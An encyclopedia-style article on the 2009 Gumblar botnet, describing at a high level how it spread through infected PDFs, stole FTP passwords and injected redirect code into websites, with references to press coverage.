Gumblar: Difference between revisions

Known as Gumblar by ScanSafe and Troj/JSRedir-R by Sophos^[1], this botnet first appeared in 2009. It is characterized by re-directing user's Google searches and is suspected^{[citation needed]} to come from Adobe Flash and PDF files.

Removal

If you want to remove Gumblar or get more info on it then go to http://www.gumblar.webs.com as it contains LOADS of info regarding the Gumblar Virus, ILOVEYOU Virus and the Conficker Virus.

Infection

Windows Personal Computers

Visitors to an infected site will be redirected to an alternative site containing further Malware, which was once gumblar.cn, but has now switched to a variety of domains. The site sends the visitor an infected PDF that is opened by the visitor's browser or Acrobat Reader. The PDF will then exploit a known vulnerability in Acrobat to gain access to the user's computer.

The virus will find FTP clients such as FileZilla and Dreamweaver and download the clients' stored passwords. It also enabled promiscuous mode on the network card, allowing it to sniff local network traffic for FTP details. It is one of the first viruses to incorporate an automated network sniffer.

Servers

Using passwords obtained from site admins, the host site will access a website via FTP and infect the website. It will download large portions of the website and inject malicious code into the website's files before uploading the files back onto the server. The code is inserted into any file that contains a <body> tag, such as HTML, PHP, JavaScript, ASP and ASPx files. The inserted PHP code contains base64-encoded JavaScript that will infect computers that execute the code. In addition, some pages may have inline frames inserted into them. Typically, iframe code contains hidden links to certain malicious websites. [1] The virus will also modify .htaccess and HOSTS files, and create images.php files in directories named 'images'. The infection is not a server-wide exploit. It will only infect sites on the server that it has passwords to.

Gumblar variants

Different companies use different names for gumblar and variants.^[2]. Initially, the malware was connecting to gumblar.cn domain but this server was shutdown later.^{[citation needed]} However, many badware variants have emerged after that and they connect to various malicious servers via iframe code.^{[citation needed]} Whatever be the nature of gumblar variants, all of them can be categorized as iframe virus.^{[citation needed]}

Gumblar resurfaced in January 2010, stealing FTP usernames and passwords and infecting HTML, PHP and Javascript files on webservers to help spread itself. ^[3][4]

References

1. Matthew Broersma. "'Gumblar' attacks spreading quickly". Retrieved 24 November 2009.
2. "Gumblar variants".
3. "Gumblar-family virus removal tool".
4. "PERL Script to remove Gumblar".

• Binning, David (15 May 2009). "Reports of Gumblar's death greatly exaggerated". Computer Weekly. Retrieved 2009-07-07.
• Staff (15 May 2009). "New computer virus on rise, warn security experts". The Telegraph (London). Retrieved 2009-07-07.
• Leyden, John (19 May 2009). "Gumblar Google-poisoning attack morphs". The Register. Retrieved 2009-07-07.
• Johnson, Bobbie (22 May 2009). "'Gumblar' PC virus targets Google users, warn experts". The Guardian (London). Retrieved 2009-07-07.
• Mills, Elinor (29 May 2009). "Gumblar attack worse than Conficker, experts warn". ZDNet. CBS Interactive Inc. Retrieved 2009-07-07.
• Dinham, Peter (7 July 2009). "Riding the Net risks drive-by malware download attack". iTWire. Retrieved 2009-07-07.